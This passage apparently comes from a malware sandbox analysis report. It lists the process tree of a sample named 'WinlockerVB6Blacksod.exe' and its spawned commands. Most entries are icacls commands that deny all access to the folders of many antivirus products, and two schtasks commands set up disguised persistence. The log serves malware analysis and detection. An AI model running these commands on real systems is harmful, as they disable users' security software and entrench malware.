  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4476
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
    3⤵
    PID:4756
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:3536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2756
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:4924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
    3⤵
    PID:1648
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:1352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3380
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
    3⤵
    PID:3456
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:828
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
    3⤵
    PID:1080
  - - C:\Windows\SysWOW64\icacls.exe
      icacls c:\programdata\Malwarebytes /deny Admin:(F)
      4⤵
      Modifies file permissions
      PID:4860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
    3⤵
    PID:4332
  - - C:\Windows\SysWOW64\icacls.exe
      icacls c:\programdata\Malwarebytes /deny System:(F)
      4⤵
      Modifies file permissions
      PID:3960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4556
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\MB3Install /deny Admin:(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:2888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
    3⤵
    PID:3356
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\MB3Install /deny System:(F)
      4⤵
      Modifies file permissions
      PID:3380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4460
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
    3⤵
    PID:3928
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:1604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4636
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4860
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:3960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2076
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4232
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4636
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4260
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4416
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3356
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2328
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4296
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4260
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3636
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2384
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3608
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:2756
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2772
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4976
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:4860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3960
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4760
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5004
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:3996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:836
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:4560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:456
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2624
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4560
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    PID:4812
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4564
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4992
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:840
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4968
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    PID:740
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4820
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:3960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    PID:2632
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5212
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5348
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5500
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5636
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5836
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:5920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:6052
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5148
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1012
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5220
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:3324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3312
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
    3⤵
    PID:4952
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5756
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
    3⤵
    PID:4460
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5224
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:5408
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:6088
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:5788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7020 /prefetch:1
  2⤵
  PID:3128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7044 /prefetch:8
  2⤵
  PID:4964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6740 /prefetch:8
  2⤵
  PID:4460
- C:\Users\Admin\Downloads\WinlockerVB6Blacksod.exe
  "C:\Users\Admin\Downloads\WinlockerVB6Blacksod.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Enumerates connected drives
  - Suspicious use of AdjustPrivilegeToken
  PID:3068
- - C:\Windows\SysWOW64\msiexec.exe
    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\Error file remover.msi" AI_SETUPEXEPATH=C:\Users\Admin\Downloads\WinlockerVB6Blacksod.exe SETUPEXEDIR=C:\Users\Admin\Downloads\ EXE_CMD_LINE="/exenoupdates /exelang 0 /noprereqs "
    3⤵
    - Enumerates connected drives
    - Suspicious use of AdjustPrivilegeToken
    PID:4408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7012 /prefetch:1
  2⤵
  PID:4932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5964 /prefetch:1
  2⤵
  PID:4068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3108 /prefetch:1
  2⤵
  PID:5372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1692 /prefetch:1
  2⤵
  PID:2632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1260 /prefetch:1
  2⤵
  PID:5984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6884 /prefetch:1
  2⤵
  PID:3652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2784 /prefetch:8
  2⤵
  PID:4364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6900 /prefetch:8
  2⤵
  PID:1800
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6940 /prefetch:1
  2⤵
  PID:5400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6392 /prefetch:1
  2⤵
  PID:5352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7324 /prefetch:1
  2⤵
  PID:3900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7484 /prefetch:1
  2⤵
  PID:2772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7724 /prefetch:1
  2⤵
  PID:4880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6852 /prefetch:1
  2⤵
  PID:3976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7120 /prefetch:1
  2⤵
  PID:212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7304 /prefetch:1
  2⤵
  PID:2884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6392 /prefetch:1
  2⤵
  PID:3900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
